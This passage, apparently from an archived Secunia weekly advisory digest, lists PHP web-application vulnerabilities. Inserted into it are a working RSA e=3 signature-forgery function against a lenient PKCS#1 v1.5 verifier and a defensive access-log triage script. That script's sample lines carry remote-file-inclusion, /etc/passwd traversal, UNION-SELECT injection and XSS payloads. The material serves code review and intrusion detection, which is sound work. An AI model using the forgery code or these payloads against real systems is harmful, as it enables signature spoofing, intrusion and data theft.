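    """Forge with the public key only (e = 3): fix the short prefix the
    lenient verifier needs, leave the rest of the block as free garbage,
    and take the cube root. s**3 < n, so no modular reduction happens."""
    k = (n.bit_length() + 7) // 8
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(message)
    garbage_bits = 8 * (k - len(prefix))
    low = int.from_bytes(prefix, "big") << garbage_bits   # smallest block with this prefix
    high = low + (1 << garbage_bits)                       # exclusive upper bound
    s = icbrt(low)
    if s ** 3 < low:
        s += 1
    if not low <= s ** 3 < high or s ** 3 >= n:
        raise ValueError("modulus too small for a cube-root forgery")
    return s


def demo():
    """Returns (lenient_accepts, strict_accepts) for a forged signature."""
    msg = b"constructed message the attacker wants accepted"
    s = forge_signature(N, msg)
    return verify_lenient(N, E, s, msg), verify_strict(N, E, s, msg)


if __name__ == "__main__":
    print(demo())
```

The only difference between the two verifiers is whether the padding length is derived from the key size or from the data; that is the check to look for when reviewing any PKCS#1 v1.5 implementation, and the reason a large public exponent only hides, rather than fixes, a lenient parser.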

 --

[SA22197] PostNuke "hits" SQL Injection Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      Manipulation of data
Released:    2006-10-03

Omid has discovered a vulnerability in PostNuke, which can be exploited
by malicious users to conduct SQL injection attacks.

Full Advisory:
http://secunia.com/advisories/22197/
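
For the web-application advisories in this issue that name a query parameter (phpBB XS "phpbb_root_path", DeluxeBB "templatefolder", Taskjitsu "key", PostNuke "hits", net2ftp "username", WWWthreads "Cat"), the following is an added example of a first-pass access-log triage, not code from Secunia or any of the vendors. Only the parameter names and bug classes come from the advisory titles; the script paths, payload strings and log lines are constructed for the example, and the regular expressions are generic heuristics for each class rather than details of the advisories.

```python
import re
from urllib.parse import parse_qsl, unquote

# Parameters from the advisory titles, mapped to the class each advisory
# reports. Paths, payloads and log lines further down are constructed.
WATCH = {
    "phpbb_root_path": "file inclusion",        # SA22177 phpBB XS
    "templatefolder": "file inclusion",         # SA22176 DeluxeBB
    "key": "sql injection",                     # SA22257 Taskjitsu
    "hits": "sql injection",                    # SA22197 PostNuke
    "username": "cross-site scripting",         # SA22255 net2ftp
    "Cat": "cross-site scripting",              # SA22211 WWWthreads
}

# Generic payload heuristics per class: an include pulled from a URL, a
# traversal or NUL truncation; a quote, comment or UNION breaking a query;
# markup or a javascript: URL in a reflected value.
PATTERNS = {
    "file inclusion": re.compile(r"^(?:https?|ftp)://|\.\./|\x00", re.I),
    "sql injection": re.compile(
        r"'|--|/\*|\bunion\b|\bselect\b|\bor\b\s+\d+\s*=\s*\d+", re.I),
    "cross-site scripting": re.compile(r"<|>|javascript:", re.I),
}

# Apache/NCSA combined format; only the fields needed for triage are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def triage_line(line):
    """Return a finding record for one log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        cls = WATCH.get(name)
        if cls is None:
            continue
        value = unquote(raw)   # second decode catches double-encoded payloads
        if PATTERNS[cls].search(value):
            findings.append((name, cls, value))
    if not findings:
        return None
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": path,
            "status": m.group("status"), "findings": findings}


def triage(log_text):
    """Triage a whole log; one record per suspicious request, in log order."""
    return [r for r in (triage_line(l) for l in log_text.splitlines()) if r]


# Constructed sample: four requests matching the advisory classes, two benign.
SAMPLE_LOG = """\
203.0.113.7 - - [02/Oct/2006:11:03:21 +0000] "GET /forum/index.php?phpbb_root_path=http://198.51.100.9/x.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [02/Oct/2006:11:03:25 +0000] "GET /board/index.php?templatefolder=../../../../etc/passwd%00 HTTP/1.1" 200 2310 "-" "Mozilla/4.0"
198.51.100.23 - - [03/Oct/2006:08:15:02 +0000] "GET /portal/index.php?module=News&hits=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 500 0 "-" "curl/7.15"
192.0.2.44 - - [03/Oct/2006:09:00:10 +0000] "GET /ftp/index.php?username=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1900 "-" "Mozilla/5.0"
192.0.2.44 - - [03/Oct/2006:09:00:11 +0000] "GET /portal/index.php?module=News&hits=10 HTTP/1.1" 200 4021 "-" "Mozilla/5.0"
192.0.2.45 - - [03/Oct/2006:09:02:00 +0000] "GET /tasks/index.php?key=abc123 HTTP/1.1" 200 1400 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for rec in triage(SAMPLE_LOG):
        for name, cls, value in rec["findings"]:
            print(f'{rec["ts"]} {rec["ip"]} {rec["path"]} {cls}: {name}={value!r}')
```

The heuristics are deliberately loose (a legitimate "username" containing "<" would be flagged), so treat a hit as a lead to pull the full request and response size for, not as proof of compromise; a 200 with an unusually large body on a file-inclusion hit is the line to look at first.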

 --

[SA22188] phpBB "avatar_path" PHP Code Execution Vulnerability

Critical:    Less critical
Where:       From remote
Impact:      System access
Released:    2006-10-04

ShAnKaR has discovered a vulnerability in phpBB, which can be exploited
by malicious users to compromise a vulnerable system.

Full Advisory:
http://secunia.com/advisories/22188/

 --

[SA22235] PHP "open_basedir" Symlink Security Bypass Vulnerability

Critical:    Less critical
Where:       Local system
Impact:      Security Bypass
Released:    2006-10-04

Stefan Esser has reported a vulnerability in PHP, which can be
exploited by malicious, local users to bypass certain security
restrictions.

Full Advisory:
http://secunia.com/advisories/22235/



========================================================================

Secunia recommends that you verify all advisories you receive
by clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only use
those supplied by the vendor.

Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/

Subscribe:
http://secunia.com/secunia_weekly_summary/

Contact details:
Web	: http://secunia.com/
E-mail	: support@private
Tel	: +45 70 20 51 44
Fax	: +45 70 20 51 45


_________________________________
Donate online for the Ron Santo Walk to Cure Diabetes!
http://www.c4i.org/ethan.html



This archive was generated by hypermail 2.1.3 : Thu Oct 05 2006 - 23:42:58 PDT